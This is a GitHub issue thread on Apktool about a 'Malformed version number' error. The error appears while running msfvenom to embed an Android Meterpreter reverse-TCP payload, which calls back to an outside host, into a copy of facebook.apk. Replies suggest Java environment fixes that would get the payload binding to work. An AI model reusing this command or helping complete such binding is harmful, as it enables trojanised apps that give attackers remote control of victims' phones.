### ISSUE TITLE
Getting error as "Error: Malformed version number string 2.4.1" in msfvenom

### ISSUE THREAD

**Issue by gulammustufa** [iBotPeaches/Apktool#2325]
I have just installed APK Tool by performing the steps given by this https://ibotpeaches.github.io/Apktool/install/ on linux system.

Now I am trying the following command.
msfvenom -x '/root/Downloads/facebook.apk' -p android/meterpreter/reverse_tcp LHOST=fw1.sshreach.me LPORT=10575 /root/Downloads/hacked.apk

After executing the command on the terminal I am getting error as below.
Error: Malformed version number string 2.4.1

I have also attached the screenshot.
![Screenshot 2020-04-11 13:11:42](https://user-images.githubusercontent.com/22556970/79038342-0c676600-7bc8-11ea-9fd1-49621618abe8.png)

**Comment by iBotPeaches** [comment]
I don't think this is Apktool's fault. While we may have released v2.4.1 I don't know what msfvenom needs to properly read that.

We can re-open if this appears to be Apktool.

**Comment by MouradRashwan** [comment]
Run these commands will fix the problem temporary or you can write them to bachrc :

_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
unset _JAVA_OPTIONS
alias='java "$_SILENT_JAVA_OPTIONS"'

**Comment by aman-bhatt-0310** [comment]
> Run these commands will fix the problem temporary or you can write them to bachrc :
> 
> _SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
> unset _JAVA_OPTIONS
> alias='java "$_SILENT_JAVA_OPTIONS"'

Can you please tell where to find this bachrc file in kali linux 2020.1b

**Comment by MouradRashwan** [comment]
> > Run these commands will fix the problem temporary or you can write them to bachrc :
> > _SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
> > unset _JAVA_OPTIONS
> > alias='java "$_SILENT_JAVA_OPTIONS"'
> 
> Can you please tell where to find this bachrc file in kali linux 2020.1b

/root/.bashrc
you have to check Show hidden files in View tab

**Comment by sudo-WearTherinG** [comment]
solution please check my reply
https://github.com/rapid7/metasploit-framework/issues/13231#issuecomment-621927088

**Comment by vinibrown99** [comment]
Give the command: unset  _JAVA_OPTIONS

**Comment by robinhamie123** [comment]
please help me 
![Screenshot from 2021-04-30 15-37-51](https://user-images.githubusercontent.com/55789176/116749366-d497b000-a9ce-11eb-8ba4-e68eadd7ace3.png)

**Comment by nikitaputintsev** [comment]
> пожалуйста, помогите мне
> ![Скриншот от 30.04.2021 15-37-51](https://user-images.githubusercontent.com/55789176/116749366-d497b000-a9ce-11eb-8ba4-e68eadd7ace3.png)

Нужно сменить пользователя и зайти под root

**Comment by daemon5422** [comment]
`hello all` I'm not able to bind my payload to an apk file 
its giving me error of java something
